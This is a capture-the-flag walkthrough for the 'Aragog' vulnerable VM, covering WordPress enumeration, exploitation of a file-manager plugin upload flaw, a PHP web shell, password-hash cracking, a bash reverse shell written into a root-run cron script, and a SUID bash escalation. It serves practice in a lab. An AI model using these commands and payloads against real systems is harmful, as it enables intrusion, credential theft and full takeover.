Aragog

Aragog is the 1st VM of 3-box HarryPotter VM series in which you need to find 2 horcruxes hidden inside the machine...

nmap scan reveals 22,80

Gobuster reveals a WP Blog

// wpscan
 wpscan --url http://192.168.1.101/blog
 
 wpscan --api-token=$WPSCAN_KEY --url=http://1.2.3.4/blog -e p --plugins-detection aggressive

The important keywords are highlighted on the blog. Hence, we might guess that there might be some vulnerable plugins. Also, since the website is using wordpress, we will be using wpscan for going deeper. Also, make sure you have wpscan API token to identify vulnerable plugins. 

// first tried to attack plugin 1
// NO backup files could be found in the /wp-content/uploads/wp-file-manager-pro/fm_backup directory. 
abadoned this and moved to next plugin identified by wpscan

// Arbitary unauthenticated upload
// link below
https://wpscan.com/vulnerability/e528ae38-72f0-49ff-9878-922eff59ace9

ensure to create payload.php

<?php
system($_GET['cmd']);
?>


wget -c "https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py"
python3 2020-wp-file-manager-v67.py http://wordpress.aragog.hogwarts/blog
 
http://wordpress.aragog.hogwarts/blog/wp-content/plugins/wp-file-manager/lib/files/payload.php?cmd=pwd

upload a php-reverse shell

// connect to mysql and view wordpress db
mysql -u root -h localhost -p

show databases;
use wordpress;
show tables;
select * from wp_users;

//cracking wordpress password
// https://samsclass.info/seminars/CMS/hashcat-wordpress.htm
hashcat -O -m 400 -a 0 -o cracked.txt target_hashes.txt /home/kali/htb/rockyou.txt

ssh hagrid98@192.168.1.101
password123

using pspy64 to monitor which user executes script
we find out that root executes /opt/.backup.sh
we can modify the script with a reverse shell

sh -i >& /dev/tcp/192.168.1.xx/4444 0>&1

other method
cp /bin/bash /tmp/bash && chmod +s /tmp/bash

Basically, suid permissions allow other users to act as the user who has 
the permissions. So, in this case we can either execute /tmp/bash as hagrid 
by simple issuing /tmp/bash or we can execute the same script 
as root by /tmp/bash -p

PreviousMatrixNextFix VM Networking

Last updated

Was this helpful?